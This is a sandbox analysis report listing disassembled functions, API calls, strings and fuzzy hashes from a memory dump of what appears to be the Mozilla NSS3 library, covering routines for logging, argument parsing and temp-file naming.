Function 6CA70AA0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 227libraryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA70AD4

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_EnterMonitor.NSS3 ref: 6CA70B0D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6CA70B2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6CA70B54
WideCharToMultiByte.KERNEL32 ref: 6CA70B94
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CA70BC9
calloc.MOZGLUE(00000001,00000014), ref: 6CA70BEA
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6CA70C15

Strings

Loaded library %s (load lib), xrefs: 6CA70D6F
error %d, xrefs: 6CA70D08

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
String ID: Loaded library %s (load lib)$error %d
API String ID: 2139286163-2368894446
Opcode ID: b8c22365ff1fc3211889f9ac0821464fff27289b81dbbd92e8b0c43b8f3093ae
Instruction ID: e623061f4507f80435f12a57d2821b3ce5f59da44863c6db735cad31018f94f0
Opcode Fuzzy Hash: b8c22365ff1fc3211889f9ac0821464fff27289b81dbbd92e8b0c43b8f3093ae
Instruction Fuzzy Hash: 06710679A002549FEB209F39CD44A6B77BCFF45358F184179F809D7641EB32AA84CBA1

Function 6CABCB70 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 225fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6CAD444C,00000000,00000000,00000000,?,6CA97F7C,6CA980DD), ref: 6CABCB8B

Part of subcall function 6CA71240: TlsGetValue.KERNEL32(00000040,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA71267
Part of subcall function 6CA71240: EnterCriticalSection.KERNEL32(?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA7127C
Part of subcall function 6CA71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA71291
Part of subcall function 6CA71240: PR_Unlock.NSS3(?,?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA712A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBCDEB5,?,6CAD444C,00000000,00000000,00000000,?,6CA97F7C,6CA980DD), ref: 6CABCB9D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6CAD444C,00000000,00000000,00000000,?,6CA97F7C,6CA980DD), ref: 6CABCBAE
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6CAD444C,00000000,00000000,00000000), ref: 6CABCBE6
PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CAD444C,00000000,00000000,00000000), ref: 6CABCC37
PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CAD444C,00000000,00000000), ref: 6CABCCA4
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CABCD84
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CAD444C,00000000), ref: 6CABCDA6
PR_IntervalToMilliseconds.NSS3(6CAD444C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAD444C), ref: 6CABCE02
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CABCE59
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6CABCE64
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CABCE72

Strings

Maximum number of concurrent open sessions: %d, xrefs: 6CABCE4A
%-25s %10d %10d%2s , xrefs: 6CABCCD3
Avg., xrefs: 6CABCBBE
Totals, xrefs: 6CABCE2E
NSS_OUTPUT_FILE, xrefs: 6CABCB86
%25s %10d %10d%2s, xrefs: 6CABCE33
Function, xrefs: 6CABCBCD
%-25s %10s %12s %12s %10s, xrefs: 6CABCBD2
% Time, xrefs: 6CABCBB9
# Calls, xrefs: 6CABCBC8

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$NSS_OUTPUT_FILE$Totals
API String ID: 2795105899-3917921256
Opcode ID: 3be7ebf8a438b56a58d475ca76af2c3101c864a9b6ae381822c9d66c1e642100
Instruction ID: e39e4803a01a6690455e5956d15d0efede5033c1b281db8aa1176c8ddb133ce4
Opcode Fuzzy Hash: 3be7ebf8a438b56a58d475ca76af2c3101c864a9b6ae381822c9d66c1e642100
Instruction Fuzzy Hash: 23716972E001949BC701AA7D5D02E7EBB39AF97748F184626F80977F11FB7198C486A3

Function 6CB56E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA6F9C9,?,6CA6F4DA,6CA6F9C9,?,?,6CA3369A), ref: 6CA0CA7A
Part of subcall function 6CA0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA0CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CA1BE66), ref: 6CB56E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CA1BE66), ref: 6CB56E98
sqlite3_snprintf.NSS3(?,00000000,6CBBAAF9,?,?,?,?,?,?,6CA1BE66), ref: 6CB56EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CA1BE66), ref: 6CB56ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CA1BE66), ref: 6CB56EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB56F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB56F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB56F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CA1BE66), ref: 6CB56FA6
sqlite3_snprintf.NSS3(?,00000000,6CBBAAF9,00000000,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB56FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB56FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB56FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB57014
sqlite3_free.NSS3(00000000,?,?,?,?,6CA1BE66), ref: 6CB5701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CA1BE66), ref: 6CB57030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB5705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CA1BE66), ref: 6CB57079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB57097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CA1BE66), ref: 6CB570A0

Strings

winGetTempname5, xrefs: 6CB57071
winGetTempname2, xrefs: 6CB570C4
mz_etilqs_, xrefs: 6CB56F18
winGetTempname1, xrefs: 6CB5708F
winGetTempname4, xrefs: 6CB57046

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: bdd06a3c8a51a1cff2de8b1ee2809af54d1362a0221ad1c5c7dba5970d58da82
Instruction ID: d4890f37a9d1729d5600242a0a6d274a43577b101892d894b74b1c1b515d9775
Opcode Fuzzy Hash: bdd06a3c8a51a1cff2de8b1ee2809af54d1362a0221ad1c5c7dba5970d58da82
Instruction Fuzzy Hash: 3351B271F1029117E7005A30AC51FBF366A9F9235CF584538E805A7BC1FF65992D82D3

Function 6CAE4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA975C2,00000000,00000000,00000001), ref: 6CAE5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA975C2,00000000), ref: 6CAE5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAE505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CAE5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CAE50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA975C2), ref: 6CAE50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAE50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAE50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE5153
free.MOZGLUE(?), ref: 6CAE516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CAE517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAE5195

Strings

name=, xrefs: 6CAE5057
config=, xrefs: 6CAE509B
library=, xrefs: 6CAE5043
nss=, xrefs: 6CAE5083
parameters=, xrefs: 6CAE506B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 6d1080302516951b6ae8bee753adf3867adc6664e09a4dd8b62abdff8229227f
Instruction ID: ff9f9ddfc2e861569398d1a025649f911e6be81d9141fb750f238eaf6b2c4055
Opcode Fuzzy Hash: 6d1080302516951b6ae8bee753adf3867adc6664e09a4dd8b62abdff8229227f
Instruction Fuzzy Hash: 0A51A4B5E012155FEB00DF24ED41AAE37A89F0A348F180460FC55E7741EB25E959DBF2

Function 6CAB8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6CAB8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8EB3

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAB8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CAB8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8F29
PR_LogPrint.NSS3(?,00000000), ref: 6CAB8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CAB8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8F80
PR_LogPrint.NSS3(?,00000000), ref: 6CAB8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CAB8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CAB8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CAB9047

Strings

C_WrapKey, xrefs: 6CAB8E71
hKey = 0x%x, xrefs: 6CAB8F5B, 6CAB8F6B
hWrappingKey = 0x%x, xrefs: 6CAB8F01, 6CAB8F11
pMechanism = 0x%p, xrefs: 6CAB8EE0
pWrappedKey = 0x%p, xrefs: 6CAB8FAD
pulWrappedKeyLen = 0x%p, xrefs: 6CAB8FC8
*pulWrappedKeyLen = 0x%x, xrefs: 6CAB9042
(CK_INVALID_HANDLE), xrefs: 6CAB8EAC, 6CAB8F1F, 6CAB8F79
hSession = 0x%x, xrefs: 6CAB8E8E, 6CAB8E9E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: 8d4e690f93fab55103b34047d81d821e9b6cf64bf6d23dd999893875dcd0557d
Instruction ID: 4530bcb559a58c46170b09e15175657725be6ef846702ef0babc2c79f42782e1
Opcode Fuzzy Hash: 8d4e690f93fab55103b34047d81d821e9b6cf64bf6d23dd999893875dcd0557d
Instruction Fuzzy Hash: D1510735501146AFDB009F68EE48F9E777AEB4675DF084025F50877A12DB309958CBA3

Function 6CAE4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CAD4F51,00000000), ref: 6CAE4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAD4F51,00000000), ref: 6CAE4C5B
PR_smprintf.NSS3(6CBBAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CAD4F51,00000000), ref: 6CAE4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CAD4F51,00000000), ref: 6CAE4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAE4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAE4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAE4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAD4F51,00000000), ref: 6CAE4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAD4F51,00000000), ref: 6CAE4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CAE4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CAE4DA2
free.MOZGLUE(?), ref: 6CAE4DB9
free.MOZGLUE(00000000), ref: 6CAE4DCF

Strings

%s,%s, xrefs: 6CAE4C4B
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CAE4D9D
0x%08lx=[%s %s], xrefs: 6CAE4D80
slotFlags, xrefs: 6CAE4D34
rootFlags, xrefs: 6CAE4D47
ootT, xrefs: 6CAE4D1A
every, xrefs: 6CAE4CA1
timeout, xrefs: 6CAE4C91
any, xrefs: 6CAE4C96
rust, xrefs: 6CAE4D22

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 4eb7f5fef4667b21c78c79cb264a0b9225838723dfc56d020ce2df07f96bc886
Instruction ID: 88cc023f8b9423861840077475871ff9bb92846f7206f71d95165f9fef9ab579
Opcode Fuzzy Hash: 4eb7f5fef4667b21c78c79cb264a0b9225838723dfc56d020ce2df07f96bc886
Instruction Fuzzy Hash: 95418DB5D0018167DB119F999C84ABF3B79AF9A30CF184124EC165BB01EB31E9A8D7D3

Function 6CAC6910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CAC6943

Part of subcall function 6CAE4210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,1EE240A8,flags,?,00000000,?,6CAC5947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6CAE4220
Part of subcall function 6CAE4210: NSSUTIL_ArgGetParamValue.NSS3(?,6CAC5947,?,?,?,?,?,?,00000000,?,00000000,?,6CAC7703,?,00000000,00000000), ref: 6CAE422D
Part of subcall function 6CAE4210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CAC7703), ref: 6CAE424B
Part of subcall function 6CAE4210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CAC7703,?,00000000), ref: 6CAE4272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CAC6957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CAC6972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CAC6983

Part of subcall function 6CAE3EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6CABC79F,?,6CAC6247,70E85609,?,?,6CABC79F,6CAC781D,?,6CABBD52,00000001,70E85609,D85D8B04,?), ref: 6CAE3EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CAC69AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CAC69BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CAC69D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CAC69DF

Part of subcall function 6CAE4020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,754C4C80,?,6CAE50B7,?), ref: 6CAE4041

free.MOZGLUE(00000000), ref: 6CAC69F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6CAC6A04
free.MOZGLUE(00000000), ref: 6CAC6A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6CAC6A29
free.MOZGLUE(00000000), ref: 6CAC6A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6CAC6A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6CAC6A5B

Strings

configdir=, xrefs: 6CAC69A4
readOnly, xrefs: 6CAC693D
keyPrefix=, xrefs: 6CAC69CC
nocertdb, xrefs: 6CAC6951
nokeydb, xrefs: 6CAC6968
certPrefix=, xrefs: 6CAC69B8
flags, xrefs: 6CAC6937, 6CAC6942, 6CAC6956, 6CAC696D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: d1e6ef8697a6536af84ee771be741bc61aabd0a24a51e405daecaa40538effce
Instruction ID: 76d7169ee3fe6413028086756a31784bcb99995080c3c562f3074f26dbad72ce
Opcode Fuzzy Hash: d1e6ef8697a6536af84ee771be741bc61aabd0a24a51e405daecaa40538effce
Instruction Fuzzy Hash: D04151F5E402096BEB00DA74AD81B7E77BC9F15258F184420E905E7B42E635DA5886A2

Function 6CAB4950 Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6CAB4976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB49A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB49B6

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB49CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAB49FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4A09
PR_LogPrint.NSS3(?,00000000), ref: 6CAB4A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CAB4A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CAB4A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6CAB4A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6CAB4B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4B26
PR_LogPrint.NSS3(?,00000000), ref: 6CAB4B3C

Strings

hObject = 0x%x, xrefs: 6CAB49E4, 6CAB49F4
phNewObject = 0x%p, xrefs: 6CAB4A77
pTemplate = 0x%p, xrefs: 6CAB4A39
C_CopyObject, xrefs: 6CAB4971
*phNewObject = 0x%x, xrefs: 6CAB4B01, 6CAB4B11
ulCount = %d, xrefs: 6CAB4A57
(CK_INVALID_HANDLE), xrefs: 6CAB49AF, 6CAB4A02, 6CAB4B1F
hSession = 0x%x, xrefs: 6CAB4991, 6CAB49A1

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject
API String ID: 1003633598-1222337137
Opcode ID: 75ce5375a411c7ebd7aa14dd38cb55a60a80ba154edc79c8a213cf6b458971b4
Instruction ID: a5d8cfc19b92ca5c4d65a6ff25c7811be24d301ed9af423e89c05bd7872b6207
Opcode Fuzzy Hash: 75ce5375a411c7ebd7aa14dd38cb55a60a80ba154edc79c8a213cf6b458971b4
Instruction Fuzzy Hash: 1951E535601189ABDB00DF54DD88F9E7B79EB4A75CF084028F90877B12CB309D59CBA6

